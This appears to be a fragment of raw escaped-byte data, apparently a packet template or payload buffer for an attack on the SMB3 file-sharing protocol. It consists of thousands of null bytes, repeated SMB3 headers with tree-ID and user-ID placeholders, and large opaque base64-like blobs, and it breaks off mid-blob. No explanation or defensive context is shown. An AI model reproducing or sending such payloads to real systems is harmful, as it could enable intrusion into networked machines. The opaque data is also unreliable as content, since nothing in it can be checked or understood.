\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x83\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x13\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0#\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd03\\\\x00\\\\x00\\\\x00\\\\x10GCYPv9lQlkfTV1+aTMUTA0VfaLFyhZq68nTvu6n4pfUV30t9T3TFceGCIx4zTnCQ6S5EjjToosWCxmsltoACAot76+pWFnqcM81lhzddyobk6y7FHmjg68R4aFhZxnGaWE98CXh+wNXxpVQrRWuXsT/exO9Fgq3iJa9YrhsWDVr